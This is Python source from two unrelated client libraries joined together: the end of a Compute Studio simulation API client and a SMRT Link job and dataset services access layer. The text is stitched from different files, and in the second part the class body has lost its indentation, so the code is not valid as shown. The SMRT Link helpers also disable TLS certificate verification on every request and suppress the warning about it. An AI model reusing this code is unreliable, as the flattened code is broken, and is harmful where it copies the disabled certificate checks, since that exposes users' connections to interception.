        --------
        response: dict
            Response from the Compute Studio server. Use this to get the
            simulation ID and status.

        Raises
        ------
        APIException
            If the simulation could not be created or its inputs failed
            validation.
        """
        adjustment = adjustment or {}
        meta_parameters = meta_parameters or {}
        resp = requests.post(
            self.sim_url,
            json={"adjustment": adjustment, "meta_parameters": meta_parameters},
            headers=self.auth_header,
        )
        if resp.status_code == 201:
            data = resp.json()
            edit_url = f"{self.sim_url}{data['sim']['model_pk']}/edit/"
            pollresp = requests.get(edit_url, headers=self.auth_header)
            polldata = pollresp.json()
            # Poll until the inputs leave the PENDING state.
            while pollresp.status_code == 200 and polldata["status"] == "PENDING":
                time.sleep(3)
                pollresp = requests.get(edit_url, headers=self.auth_header)
                polldata = pollresp.json()
            if pollresp.status_code == 200 and polldata["status"] == "SUCCESS":
                simresp = requests.get(
                    f"{self.sim_url}{data['sim']['model_pk']}/remote/",
                    headers=self.auth_header,
                )
                return simresp.json()
            else:
                raise APIException(pollresp.json())
        raise APIException(resp.json())

    def detail(
        self,
        model_pk: int,
        include_outputs: bool = False,
        wait: bool = True,
        polling_interval: int = 5,
        timeout: int = 600,
    ):
        """
        Get detail for a simulation.

        Parameters
        ----------
        model_pk : int
            ID for the simulation.
        include_outputs: bool
            Include outputs from the simulation in addition to the simulation
            metadata.
        wait: bool
            If True, block until the simulation has finished; otherwise return
            the pending response immediately.
        polling_interval: int
            Polling interval dictates how often the status of the results will
            be checked.
        timeout: int
            Time in seconds to wait for the simulation to finish.

        Returns
        --------
        response: dict
            Response from the Compute Studio server.

        Raises
        ------
        TimeoutError
            If the simulation is not ready within ``timeout`` seconds.
        APIException
            On any unexpected response status.
        """
        if include_outputs:
            url = f"{self.sim_url}{model_pk}/"
        else:
            url = f"{self.sim_url}{model_pk}/remote/"
        start = time.time()
        while True:
            if (time.time() - start) > timeout:
                raise TimeoutError(f"Simulation not ready in under {timeout} seconds.")
            resp = requests.get(url, headers=self.auth_header)
            if resp.status_code == 202 and wait:
                # Still pending: sleep before polling again. (The previous
                # implementation issued `continue` before an unreachable
                # sleep call, producing a busy-wait loop that hammered the
                # server.)
                time.sleep(polling_interval)
            elif resp.status_code == 202 and not wait:
                return resp.json()
            elif resp.status_code == 200:
                return resp.json()
            else:
                raise APIException(resp.json())

    def inputs(self, model_pk: Optional[int] = None):
        """
        Get the inputs for a simulation or retrieve the inputs documentation
        for the app.

        Parameters
        -----------
        model_pk: int
            ID for the simulation. If None, the app's inputs documentation is
            returned instead.

        Returns
        -------
        response: dict
            Response from the Compute Studio server.
        """
        if model_pk is None:
            resp = requests.get(f"{self.sim_url}inputs/", headers=self.auth_header)
            resp.raise_for_status()
            return resp.json()
        else:
            resp = requests.get(
                f"{self.sim_url}{model_pk}/edit/", headers=self.auth_header
            )
            resp.raise_for_status()
            return resp.json()

    def results(self, model_pk: int, timeout: int = 600):
        """
        Retrieve and parse results into the appropriate data structure.
        Currently, CSV outputs are loaded into a pandas `DataFrame` when pandas
        is installed. Other outputs are returned as is.

        Parameters
        ----------
        model_pk: int
            ID for the simulation.
        timeout: int
            Time in seconds to wait for the simulation to finish.

        Returns
        -------
        result: dict
            Dictionary of simulation outputs formated as title:output.
        """
        result = self.detail(model_pk, include_outputs=True, wait=True, timeout=timeout)
        res = {}
        for output in result["outputs"]["downloadable"]:
            if output["media_type"] == "CSV":
                # Bug fix: the original condition warned (and then crashed on
                # `pd.read_csv`) when pandas WAS installed, and silently
                # returned raw text when it was missing. Warn only when pandas
                # is unavailable.
                if pd is None:
                    warnings.warn(
                        "Install pandas to return CSV output as a pandas DataFrame."
                    )
                    res[output["title"]] = output["data"]
                else:
                    res[output["title"]] = pd.read_csv(StringIO(output["data"]))
            else:
                res[output["title"]] = output["data"]
        return res

    def update(
        self,
        model_pk: int,
        title: Optional[str] = None,
        is_public: Optional[bool] = None,
        notify_on_completion: Optional[bool] = None,
    ):
        """
        Update meta data about a simulation.

        .. code-block:: python

            cs.update(
                model_pk=123,
                title="hello world",
                is_public=True,
                notify_on_completion=True
            )

        Parameters
        ----------
        model_pk: int
            ID for the simulation.
        title: str
            Title of the simulation.
        is_public: bool
            Set whether simulation is public or private.
        notify_on_completion: bool
            Send an email notification when the simulation completes.

        Returns
        -------
        response: dict
            Response from the Compute Studio server.

        Raises
        ------
        APIException
            If the server does not accept the update.
        """
        # Only send the fields the caller actually supplied.
        sim_kwargs = {
            name: val
            for name, val in [
                ("title", title),
                ("is_public", is_public),
                ("notify_on_completion", notify_on_completion),
            ]
            if val is not None
        }
        resp = requests.put(
            f"{self.sim_url}{model_pk}/",
            json=sim_kwargs,
            headers=self.auth_header,
        )
        if resp.status_code == 200:
            return resp.json()
        else:
            raise APIException(resp.json())

    def get_token(self, api_token):
        """Resolve the API token.

        Resolution order: the explicit ``api_token`` argument, the
        ``CS_API_TOKEN`` environment variable, then the ``~/.cs-api-token``
        file.

        Raises
        ------
        APIException
            If no token can be found in any of the three locations.
        """
        token_file_path = Path.home() / ".cs-api-token"
        if api_token:
            return api_token
        elif os.environ.get("CS_API_TOKEN", None) is not None:
            return os.environ["CS_API_TOKEN"]
        elif token_file_path.exists():
            with open(token_file_path, "r") as f:
                return f.read().strip()
        else:
            raise APIException(
                f"API token not found. It can be passed as an argument to "
                f"this class, as an environment variable at CS_API_TOKEN, "
                f"or read from {token_file_path}"
            )
|
"""Utils for Updating state/progress and results to WebServices
"""
from builtins import object
import base64
import json
import logging
import pprint
import time
import datetime
import warnings
import os
import pytz
import requests
from requests import RequestException
# To disable the ssl cert check warning
from requests.packages.urllib3.exceptions import InsecureRequestWarning # pylint: disable=import-error
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # pylint: disable=no-member
from pbcommand.models import (FileTypes,
DataSetFileType,
DataStore,
DataStoreFile)
from pbcommand.utils import get_dataset_metadata
from .models import (SMRTServiceBaseError,
JobResult, JobStates, JobExeError, JobTypes,
ServiceResourceTypes, ServiceJob, JobEntryPoint,
JobTask)
from pbcommand.pb_io import load_report_from
from .utils import to_sal_summary
log = logging.getLogger(__name__)
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
# log.addHandler(logging.NullHandler()) # to prevent the annoying 'No handlers .. ' msg
# Everything else is considered a non-public
__all__ = ['ServiceAccessLayer', 'SmrtLinkAuthClient']
class Constants(object):
    """Namespace for shared request constants."""

    # Default headers: all payloads are sent/received as JSON.
    HEADERS = {"Content-type": "application/json"}
def __jsonable_request(request_method, headers):
    """Wrap *request_method* so the returned callable JSON-encodes its payload.

    The returned callable has the signature ``(url, payload_dict)``.
    """

    def _send(url, payload):
        # FIXME 'verify' should be passed in
        return request_method(
            url, data=json.dumps(payload), headers=headers, verify=False
        )

    return _send
def _post_requests(headers):
    """Return a JSON-encoding wrapper around ``requests.post``."""
    return __jsonable_request(requests.post, headers)
def _put_requests(headers):
    """Return a JSON-encoding wrapper around ``requests.put``."""
    return __jsonable_request(requests.put, headers)
def _get_requests(headers):
    """Return a callable that GETs a URL with *headers* (SSL verification off)."""

    def _fetch(url):
        return requests.get(url, headers=headers, verify=False)

    return _fetch
def _parse_base_service_error(response):
    """Raise if the response body encodes a SMRT Server error datastructure.

    The services are not trusted: even a 200 response may carry an error
    payload, so the body is probed and ``SMRTServiceBaseError`` is raised when
    it parses as one. Otherwise the response is returned unchanged.

    :type response: requests.Response
    """
    if not response.ok:
        return response
    try:
        raise SMRTServiceBaseError.from_d(response.json())
    except (KeyError, TypeError):
        # The body did not parse as a server error -> everything is fine.
        return response
def __get_headers(h):
    """Fall back to the default JSON headers when *h* is None."""
    return Constants.HEADERS if h is None else h
def _process_rget(total_url, ignore_errors=False, headers=None):
    """GET *total_url* and return the decoded JSON body.

    Raises (via ``raise_for_status``) on a non-2xx status unless
    *ignore_errors* is set.
    """
    response = _get_requests(__get_headers(headers))(total_url)
    _parse_base_service_error(response)
    if not (response.ok or ignore_errors):
        log.error("Failed ({s}) GET to {x}".format(x=total_url, s=response.status_code))
        response.raise_for_status()
    return response.json()
def _process_rget_with_transform(func, ignore_errors=False):
    """Return a GET helper that applies ``func(json_d) -> T`` to the payload."""

    def _run(total_url, headers=None):
        return func(
            _process_rget(total_url, ignore_errors=ignore_errors, headers=headers)
        )

    return _run
def _process_rget_with_jobs_transform(total_url, ignore_errors=False, headers=None):
    """GET a job-list endpoint and return ``ServiceJob``s, newest id first.

    Shared by several job-listing entry points; jobs are sorted by id
    descending so recently-created jobs show up first.
    """
    raw_jobs = _process_rget(total_url, ignore_errors=ignore_errors, headers=headers)
    return sorted(
        (ServiceJob.from_d(raw) for raw in raw_jobs),
        key=lambda job: job.id,
        reverse=True,
    )
def _process_rget_or_none(func, ignore_errors=False):
    """
    Return a GET helper that applies *func* to the JSON payload on success,
    or returns None when the request fails.

    Intended for looking up resources by id where a 404 is an expected
    outcome rather than an error.
    """

    # Fix: give `headers` a None default for consistency with the other
    # request wrappers in this module (previously it was a required
    # positional argument).
    def wrapper(total_url, headers=None):
        try:
            return _process_rget_with_transform(func, ignore_errors)(total_url, headers)
        except (RequestException, SMRTServiceBaseError):
            # FIXME
            # this should be a tighter exception case
            # only look for 404
            return None

    return wrapper
def _process_rget_with_job_transform_or_none(total_url, headers=None):
    """GET a job endpoint, returning a ``ServiceJob`` or None if the lookup fails."""
    lookup = _process_rget_or_none(ServiceJob.from_d)
    return lookup(total_url, headers=headers)
def __process_creatable_to_json(f):
    """Wrap a header-taking POST/PUT factory *f* so the resulting callable
    sends *payload_d* as JSON and returns the decoded response body.

    The returned callable has the signature ``(total_url, payload_d, headers)``.
    """

    def wrapper(total_url, payload_d, headers):
        r = f(__get_headers(headers))(total_url, payload_d)
        _parse_base_service_error(r)
        # FIXME This should be strict to only return a 201
        if r.status_code not in (200, 201, 202, 204):
            # Fix: the original format string was missing the closing paren
            # after the status code ("Failed ({s} to call {u}").
            log.error("Failed ({s}) to call {u}".format(u=total_url, s=r.status_code))
            log.error("payload")
            log.error("\n" + pprint.pformat(payload_d))
            r.raise_for_status()
        j = r.json()
        return j

    return wrapper


_process_rpost = __process_creatable_to_json(_post_requests)
_process_rput = __process_creatable_to_json(_put_requests)
def _process_rpost_with_transform(func):
    """Return a POST helper that applies *func* to the decoded JSON response."""

    def _run(total_url, payload_d, headers=None):
        return func(_process_rpost(total_url, payload_d, headers))

    return _run
def _process_rput_with_transform(func):
    """Return a PUT helper that applies *func* to the decoded JSON response."""

    def _run(total_url, payload_d, headers=None):
        return func(_process_rput(total_url, payload_d, headers))

    return _run
def _to_url(base, ext):
    """Concatenate a base URI and a path extension."""
    return base + ext
def _null_func(x):
    """Identity pass-through transform (used where no conversion is needed)."""
    return x
def _transform_job_tasks(j):
    """Convert a list of raw task dicts into ``JobTask`` instances."""
    return list(map(JobTask.from_d, j))
def _import_dataset_by_type(dataset_type_or_id):
    """Build a POST helper that submits an import-dataset job.

    Accepts either a ``DataSetFileType`` instance or a raw type-id string.
    """
    if isinstance(dataset_type_or_id, DataSetFileType):
        ds_type_id = dataset_type_or_id.file_type_id
    else:
        ds_type_id = dataset_type_or_id

    def _submit(total_url, path, headers, avoid_duplicate_import=False):
        payload = {
            "datasetType": ds_type_id,
            "path": path,
            "avoidDuplicateImport": avoid_duplicate_import,
        }
        return _process_rpost_with_transform(ServiceJob.from_d)(
            total_url, payload, headers
        )

    return _submit
def _get_job_by_id_or_raise(sal, job_id, error_klass, error_messge_extras=None):
    """Look up a job by id, raising *error_klass* when it cannot be found.

    Optional extra detail can be appended to the error message via
    *error_messge_extras* (name kept as-is for caller compatibility).
    """
    job = sal.get_job_by_id(job_id)
    if job is not None:
        return job
    details = "" if error_messge_extras is None else error_messge_extras
    base_msg = "Failed to find job {i}".format(i=job_id)
    raise error_klass(" ".join([base_msg, details]))
def _block_for_job_to_complete(sal, job_id, time_out=1200, sleep_time=2,
                               abort_on_interrupt=True):
    """
    Waits for a job to complete by polling the services until the job reaches
    a completed state or the timeout is exceeded.
    :param sal: ServiceAccessLayer
    :param job_id: Job Id
    :param time_out: Total runtime (in sec) before aborting; None disables the limit
    :param sleep_time: polling interval (in sec)
    :param abort_on_interrupt: on KeyboardInterrupt, terminate the remote job
        before re-raising
    :rtype: JobResult
    :raises: KeyError if job is not initially found, or JobExeError
    if the job fails during the polling process or times out
    """
    try:
        external_job_id = None
        # Give the services a moment to register the job before the first lookup.
        time.sleep(sleep_time)
        job = _get_job_by_id_or_raise(sal, job_id, KeyError)
        log.info("SMRT Link job {i} ({u})".format(i=job.id, u=job.uuid))
        log.debug("time_out = {t}".format(t=time_out))
        error_msg = ""
        job_result = JobResult(job, 0, error_msg)
        started_at = time.time()
        # number of polling steps
        i = 0
        while True:
            run_time = time.time() - started_at
            # Log the external (e.g. Cromwell) workflow id the first time it appears.
            if external_job_id is None and job.external_job_id is not None:
                external_job_id = job.external_job_id
                log.info("Cromwell workflow ID is %s", external_job_id)
            if job.state in JobStates.ALL_COMPLETED:
                break
            i += 1
            time.sleep(sleep_time)
            msg = "Running pipeline {n} (job {j}) state: {s} runtime:{r:.2f} sec {i} iteration".format(n=job.name, j=job.id, s=job.state, r=run_time, i=i)
            log.debug(msg)
            # making the exceptions different to distinguish between an initial
            # error and a "polling" error. Adding some msg details
            job = _get_job_by_id_or_raise(sal, job_id, JobExeError, error_messge_extras=msg)
            # FIXME, there's currently not a good way to get errors for jobs
            job_result = JobResult(job, run_time, "")
            # Timeout is checked against wall-clock runtime, after each poll.
            if time_out is not None:
                if run_time > time_out:
                    raise JobExeError("Exceeded runtime {r} of {t}. {m}".format(r=run_time, t=time_out, m=msg))
        return job_result
    except KeyboardInterrupt:
        if abort_on_interrupt:
            sal.terminate_job_id(job_id)
        raise
# Make this consistent somehow. Maybe defined 'shortname' in the core model?
# Martin is doing this for the XML file names
# Maps dataset metatypes (pbcommand FileTypes) to the dataset-service
# endpoint names used when building URLs.
DATASET_METATYPES_TO_ENDPOINTS = {
    FileTypes.DS_SUBREADS_H5: "hdfsubreads",
    FileTypes.DS_SUBREADS: "subreads",
    FileTypes.DS_ALIGN: "alignments",
    FileTypes.DS_REF: "references",
    FileTypes.DS_BARCODE: "barcodes",
    FileTypes.DS_CCS: "ccsreads",
    FileTypes.DS_CONTIG: "contigs",
    # NOTE(review): "cssalignments" looks like a typo for "ccsalignments" —
    # confirm against the server's actual routes before changing.
    FileTypes.DS_ALIGN_CCS: "cssalignments",
    FileTypes.DS_GMAP_REF: "gmapreferences"}
def _get_endpoint_or_raise(ds_type):
    """Map a dataset metatype to its service endpoint name, or raise KeyError."""
    try:
        return DATASET_METATYPES_TO_ENDPOINTS[ds_type]
    except KeyError:
        raise KeyError("Unsupported datasettype {t}. Supported values {v}".format(t=ds_type, v=list(DATASET_METATYPES_TO_ENDPOINTS.keys())))
def _job_id_or_error(job_or_error, custom_err_msg=None):
    """
    Extract the job id from a job-creation response (by type), or raise
    ``JobExeError`` built from the raw error payload.

    :raises: JobExeError
    """
    if isinstance(job_or_error, ServiceJob):
        return job_or_error.id
    # Not a ServiceJob: treat the payload as an error dict.
    emsg = job_or_error.get('message', "Unknown")
    if custom_err_msg is not None:
        emsg += " {f}".format(f=custom_err_msg)
    raise JobExeError("Failed to create job. {e}. Raw Response {x}".format(e=emsg, x=job_or_error))
def _to_ds_file(d):
    """Convert a raw service dict into a ``DataStoreFile``.

    ``is_chunked`` isn't exposed at the service level, so it is always False.
    """
    return DataStoreFile(
        d['uuid'],
        d['sourceId'],
        d['fileTypeId'],
        d['path'],
        is_chunked=False,
        name=d.get("name", ""),
        description=d.get("description", ""),
    )
def _to_datastore(dx):
    """Build a ``DataStore`` from a raw list of file dicts.

    Works around the service endpoint returning a bare list of files rather
    than a datastore object.
    """
    return DataStore([_to_ds_file(raw) for raw in dx])
def _to_job_report_files(dx):
    """Convert raw report entries into {reportTypeId, dataStoreFile} dicts."""
    converted = []
    for entry in dx:
        converted.append({u"reportTypeId": entry["reportTypeId"],
                          u"dataStoreFile": _to_ds_file(entry["dataStoreFile"])})
    return converted
def _to_entry_points(d):
    """Convert raw entry-point dicts into ``JobEntryPoint`` instances."""
    return list(map(JobEntryPoint.from_d, d))
def _get_all_report_attributes(sal_get_reports_func, sal_get_reports_details_func, job_id):
    """Collect every report attribute for a job into a single {id: value} dict.

    Note, this assumes that only one report type has been created. This is
    probably not a great idea. Should re-evaluate this.
    """
    all_report_attributes = {}
    for report_datafile in sal_get_reports_func(job_id):
        # Each entry maps a report type to a datastore file; take the file's uuid.
        r_uuid = list(report_datafile.values())[0].uuid
        report = sal_get_reports_details_func(job_id, r_uuid)
        for attribute in report['attributes']:
            all_report_attributes[attribute['id']] = attribute['value']
    return all_report_attributes
def _to_relative_tasks_url(job_type):
    """Return a function mapping a job id/uuid to its relative tasks URL."""

    def _build(job_id_or_uuid):
        parts = [ServiceAccessLayer.ROOT_JOBS, job_type, str(job_id_or_uuid), "tasks"]
        return "/".join(parts)

    return _build
def _show_deprecation_warning(msg):
    """Emit *msg* as a once-per-location DeprecationWarning.

    Suppressed entirely when the PB_TEST_MODE environment variable is set.
    """
    if "PB_TEST_MODE" in os.environ:
        return
    warnings.simplefilter('once', DeprecationWarning)
    warnings.warn(msg, DeprecationWarning)
    warnings.simplefilter('default', DeprecationWarning)  # reset filter
class ServiceAccessLayer(object): # pragma: no cover
"""
General Client Access Layer for interfacing with the job types on
SMRT Link Analysis Services. This API only supports insecure (HTTP)
access to localhost.
As of 10-02-2018, this should only be used (minimally) for internal purposes. All
access to the Services should be done via SmrtLinkAuthClient.
"""
ROOT_SL = "/smrt-link"
ROOT_JM = ROOT_SL + "/job-manager"
ROOT_JOBS = ROOT_JM + "/jobs"
ROOT_MJOBS = ROOT_JM + "/multi-jobs"
ROOT_RUNS = ROOT_SL + "/runs"
ROOT_SAMPLES = ROOT_SL + "/samples"
ROOT_DS = "/smrt-link/datasets"
ROOT_PT = '/smrt-link/resolved-pipeline-templates'
# in sec when blocking to run a job
JOB_DEFAULT_TIMEOUT = 60 * 30
def __init__(self, base_url, port, debug=False, sleep_time=2):
"""
:param base_url: base url of the SL Server. This MUST be either 'localhost' or 'http://localhost'
:param port: port of the SL server
:param debug: set improved debugging output on Services request failures
:param sleep_time: sleep time (in seconds) between polling for job status
"""
self.base_url = self._to_base_url(base_url)
self.port = port
# This will display verbose details with respect to the failed request
self.debug = debug
self._sleep_time = sleep_time
if self.__class__.__name__ == "ServiceAccessLayer":
_show_deprecation_warning("Please use the SmrtLinkAuthClient', direct localhost access is not publicly supported")
def _get_headers(self):
return Constants.HEADERS
def _to_base_url(self, h):
if h not in {"http://localhost", "localhost"}:
raise NotImplementedError("This API only supports HTTP connections to localhost")
prefix = "http://"
return h if h.startswith(prefix) else prefix + h
@property
def uri(self):
return "{b}:{u}".format(b=self.base_url, u=self.port)
def _to_url(self, rest):
return _to_url(self.uri, rest)
def __repr__(self):
return "<{k} {u} >".format(k=self.__class__.__name__, u=self.uri)
def to_summary(self):
"""
Returns a summary of System status, DataSets, and Jobs in the system
:rtype: str
"""
return to_sal_summary(self)
def get_status(self):
"""Get status of the server
:rtype: dict
"""
# This should be converted to a concrete typed object
return _process_rget(_to_url(self.uri, "/status"),
headers=self._get_headers())
def get_job_by_type_and_id(self, job_type, job_id):
return _process_rget_with_job_transform_or_none(_to_url(self.uri, "{p}/{t}/{i}".format(i=job_id, t=job_type, p=ServiceAccessLayer.ROOT_JOBS)), headers=self._get_headers())
def get_job_by_id(self, job_id):
"""Get a Job by int id"""
# FIXME. Make this an internal method It's ambiguous which job type type you're asking for
return _process_rget_with_job_transform_or_none(_to_url(self.uri, "{r}/{i}".format(i=job_id, r=ServiceAccessLayer.ROOT_JOBS)), headers=self._get_headers())
def _get_job_resource_type(self, job_type, job_id, resource_type_id):
# grab the datastore or the reports
_d = dict(t=job_type, i=job_id, r=resource_type_id, p=ServiceAccessLayer.ROOT_JOBS)
return _process_rget_with_job_transform_or_none(_to_url(self.uri, "{p}/{t}/{i}/{r}".format(**_d)), headers=self._get_headers())
def _get_job_resource_type_with_transform(self, job_type, job_id, resource_type_id, transform_func):
_d = dict(t=job_type, i=job_id, r=resource_type_id, p=ServiceAccessLayer.ROOT_JOBS)
return _process_rget_or_none(transform_func)(_to_url(self.uri, "{p}/{t}/{i}/{r}".format(**_d)), headers=self._get_headers())
def _get_jobs_by_job_type(self, job_type, query=None):
base_url = "{p}/{t}".format(t=job_type, p=ServiceAccessLayer.ROOT_JOBS)
if query is not None:
base_url = "".join([base_url, "?", query])
return _process_rget_with_jobs_transform(_to_url(self.uri, base_url),
headers=self._get_headers())
def get_multi_analysis_jobs(self):
return _process_rget_with_jobs_transform(_to_url(self.uri, "{p}/{t}".format(t="multi-analysis", p=ServiceAccessLayer.ROOT_MJOBS)), headers=self._get_headers())
def get_multi_analysis_job_by_id(self, int_or_uuid):
return _process_rget_with_job_transform_or_none(_to_url(self.uri, "{p}/{t}/{i}".format(t="multi-analysis", p=ServiceAccessLayer.ROOT_MJOBS, i=int_or_uuid)), headers=self._get_headers())
def get_multi_analysis_job_children_by_id(self, multi_job_int_or_uuid):
return _process_rget_with_jobs_transform(
_to_url(self.uri, "{p}/{t}/{i}/jobs".format(t="multi-analysis", p=ServiceAccessLayer.ROOT_MJOBS, i=multi_job_int_or_uuid)),
headers=self._get_headers())
def get_all_analysis_jobs(self):
return _process_rget_with_jobs_transform(
_to_url(self.uri, "{p}/analysis-jobs".format(
p=ServiceAccessLayer.ROOT_JM)),
headers=self._get_headers())
def get_analysis_jobs(self, query=None):
return self._get_jobs_by_job_type(JobTypes.ANALYSIS, query=query)
def get_pbsmrtpipe_jobs(self, query=None):
""":rtype: list[ServiceJob]"""
_show_deprecation_warning("Please use get_analysis_jobs() instead")
return self.get_analysis_jobs(query=query)
def get_cromwell_jobs(self):
""":rtype: list[ServiceJob]"""
return self._get_jobs_by_job_type(JobTypes.CROMWELL)
def get_import_dataset_jobs(self):
""":rtype: list[ServiceJob]"""
return self._get_jobs_by_job_type(JobTypes.IMPORT_DS)
def get_merge_dataset_jobs(self):
""":rtype: list[ServiceJob]"""
return self._get_jobs_by_job_type(JobTypes.MERGE_DS)
def get_fasta_convert_jobs(self):
""":rtype: list[ServiceJob]"""
self._get_jobs_by_job_type(JobTypes.CONVERT_FASTA)
def get_analysis_job_by_id(self, job_id):
"""Get an Analysis job by id or UUID or return None
:rtype: ServiceJob
"""
return self.get_job_by_type_and_id(JobTypes.ANALYSIS, job_id)
def get_import_job_by_id(self, job_id):
return self.get_job_by_type_and_id(JobTypes.IMPORT_DS, job_id)
def get_analysis_job_datastore(self, job_id):
"""Get DataStore output from (pbsmrtpipe) analysis job"""
# this doesn't work the list is sli
return self._get_job_resource_type_with_transform("pbsmrtpipe", job_id, ServiceResourceTypes.DATASTORE, _to_datastore)
def _to_dsf_id_url(self, job_id, dsf_uuid):
u = "/".join([ServiceAccessLayer.ROOT_JOBS, "pbsmrtpipe", str(job_id), ServiceResourceTypes.DATASTORE, dsf_uuid])
return _to_url(self.uri, u)
def get_analysis_job_datastore_file(self, job_id, dsf_uuid):
return _process_rget_or_none(_to_ds_file)(self._to_dsf_id_url(job_id, dsf_uuid), headers=self._get_headers())
def get_analysis_job_datastore_file_download(self, job_id, dsf_uuid, output_file=None):
"""
Download an DataStore file to an output file
:param job_id:
:param dsf_uuid:
:param output_file: if None, the file name from the server (content-disposition) will be used.
:return:
"""
url = "{}/download".format(self._to_dsf_id_url(job_id, dsf_uuid))
dsf = self.get_analysis_job_datastore_file(job_id, dsf_uuid)
default_name = "download-job-{}-dsf-{}".format(job_id, dsf_uuid)
if dsf is not None:
r = requests.get(url, stream=True, verify=False, headers=self._get_headers())
if output_file is None:
try:
# 'attachment; filename="job-106-be2b5106-91dc-4ef9-b199-f1481f88b7e4-file-024.subreadset.xml'
raw_header = r.headers.get('content-disposition')
local_filename = raw_header.split("filename=")[-1].replace('"', '')
except (TypeError, IndexError, KeyError, AttributeError):
local_filename = default_name
else:
local_filename = output_file
with open(local_filename, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
r.close()
return local_filename
else:
# This should probably return None to be consistent with the current API
raise KeyError("Unable to get DataStore file {} from Job {}".format(dsf_uuid, job_id))
def get_analysis_job_reports(self, job_id):
"""Get list of DataStore ReportFile types output from (pbsmrtpipe) analysis job"""
return self._get_job_resource_type_with_transform(JobTypes.ANALYSIS, job_id, ServiceResourceTypes.REPORTS, _to_job_report_files)
def get_analysis_job_reports_objs(self, job_id):
"""
Get a List of Report Instances
:param job_id:
:rtype list[Report]
:return: List of Reports
"""
job_reports = self.get_analysis_job_reports(job_id)
return [self.get_analysis_job_report_obj(job_id, x['dataStoreFile'].uuid) for x in job_reports]
def __get_report_d(self, job_id, report_uuid, processor_func):
_d = dict(t=JobTypes.ANALYSIS, i=job_id, r=ServiceResourceTypes.REPORTS, p=ServiceAccessLayer.ROOT_JOBS,
u=report_uuid)
u = "{p}/{t}/{i}/{r}/{u}".format(**_d)
return _process_rget_or_none(processor_func)(_to_url(self.uri, u), headers=self._get_headers())
def get_analysis_job_report_details(self, job_id, report_uuid):
return self.__get_report_d(job_id, report_uuid, lambda x: x)
def get_analysis_job_report_obj(self, job_id, report_uuid):
"""
Fetch a SMRT Link Report Instance from a Job Id and Report UUID
There's inconsistencies in the API, hence the naming of the method is a bit verbose.
:rtype Report
"""
return self.__get_report_d(job_id, report_uuid, load_report_from)
def get_analysis_job_report_attrs(self, job_id):
"""Return a dict of all the Report Attributes"""
return _get_all_report_attributes(self.get_analysis_job_reports, self.get_analysis_job_report_details, job_id)
def get_import_job_reports(self, job_id):
return self._get_job_resource_type_with_transform(JobTypes.IMPORT_DS, job_id, ServiceResourceTypes.REPORTS, _to_job_report_files)
def get_import_job_report_details(self, job_id, report_uuid):
# It would have been better to return a Report instance, not raw json
_d = dict(t=JobTypes.IMPORT_DS, i=job_id, r=ServiceResourceTypes.REPORTS, p=ServiceAccessLayer.ROOT_JOBS, u=report_uuid)
return _process_rget_or_none(lambda x: x)(_to_url(self.uri, "{p}/{t}/{i}/{r}/{u}".format(**_d)), headers=self._get_headers())
def get_import_job_report_attrs(self, job_id):
"""Return a dict of all the Report Attributes"""
return _get_all_report_attributes(self.get_import_job_reports, self.get_import_job_report_details, job_id)
def get_analysis_job_entry_points(self, job_id):
return self._get_job_resource_type_with_transform(JobTypes.ANALYSIS, job_id, ServiceResourceTypes.ENTRY_POINTS, _to_entry_points)
def get_import_dataset_job_datastore(self, job_id):
"""Get a List of Service DataStore files from an import DataSet job"""
return self._get_job_resource_type(JobTypes.IMPORT_DS, job_id, ServiceResourceTypes.DATASTORE)
def get_merge_dataset_job_datastore(self, job_id):
return self._get_job_resource_type(JobTypes.MERGE_DS, job_id, ServiceResourceTypes.DATASTORE)
def _import_dataset(self, dataset_type, path, avoid_duplicate_import=False):
# This returns a job resource
url = self._to_url("{p}/{x}".format(x=JobTypes.IMPORT_DS, p=ServiceAccessLayer.ROOT_JOBS))
return _import_dataset_by_type(dataset_type)(url, path, headers=self._get_headers(), avoid_duplicate_import=avoid_duplicate_import)
def run_import_dataset_by_type(self, dataset_type, path_to_xml,
avoid_duplicate_import=False):
job_or_error = self._import_dataset(
dataset_type,
path_to_xml,
avoid_duplicate_import=avoid_duplicate_import)
custom_err_msg = "Import {d} {p}".format(p=path_to_xml, d=dataset_type)
job_id = _job_id_or_error(job_or_error, custom_err_msg=custom_err_msg)
return _block_for_job_to_complete(self, job_id, sleep_time=self._sleep_time)
def _run_import_and_block(self, func, path, time_out=None):
    """Call an import_dataset_* method and block until the job completes.

    :param func: one of the self.import_dataset_* methods
    :rtype: JobResult
    """
    # func will be self.import_dataset_X
    job_or_error = func(path)
    custom_err_msg = "Import {p}".format(p=path)
    job_id = _job_id_or_error(job_or_error, custom_err_msg=custom_err_msg)
    return _block_for_job_to_complete(self, job_id, time_out=time_out,
                                      sleep_time=self._sleep_time)

def import_dataset_subread(self, path):
    """Submit (non-blocking) an import job for a SubreadSet XML."""
    return self._import_dataset(FileTypes.DS_SUBREADS, path)

def run_import_dataset_subread(self, path, time_out=10):
    """Import a SubreadSet and block (up to time_out seconds)."""
    return self._run_import_and_block(self.import_dataset_subread, path, time_out=time_out)

def import_dataset_hdfsubread(self, path):
    """Submit (non-blocking) an import job for an HdfSubreadSet XML."""
    return self._import_dataset(FileTypes.DS_SUBREADS_H5, path)

def run_import_dataset_hdfsubread(self, path, time_out=10):
    """Import an HdfSubreadSet and block (up to time_out seconds)."""
    return self._run_import_and_block(self.import_dataset_hdfsubread, path, time_out=time_out)

def import_dataset_reference(self, path):
    """Submit (non-blocking) an import job for a ReferenceSet XML."""
    return self._import_dataset(FileTypes.DS_REF, path)

def run_import_dataset_reference(self, path, time_out=10):
    """Import a ReferenceSet and block (up to time_out seconds)."""
    return self._run_import_and_block(self.import_dataset_reference, path, time_out=time_out)

def import_dataset_barcode(self, path):
    """Submit (non-blocking) an import job for a BarcodeSet XML."""
    return self._import_dataset(FileTypes.DS_BARCODE, path)

def run_import_dataset_barcode(self, path, time_out=10):
    """Import a BarcodeSet and block (up to time_out seconds)."""
    return self._run_import_and_block(self.import_dataset_barcode, path, time_out=time_out)
def run_import_local_dataset(self, path, avoid_duplicate_import=False):
    """Import a file from FS that is local to where the services are running

    If a dataset with the same UUID is already known to the server, the
    import is skipped and a JobResult wrapping the original import job is
    returned instead.

    Returns a JobResult instance
    :rtype: JobResult
    """
    dataset_meta_type = get_dataset_metadata(path)
    result = self.get_dataset_by_uuid(dataset_meta_type.uuid,
                                      ignore_errors=True)
    if result is None:
        log.info("Importing dataset {p}".format(p=path))
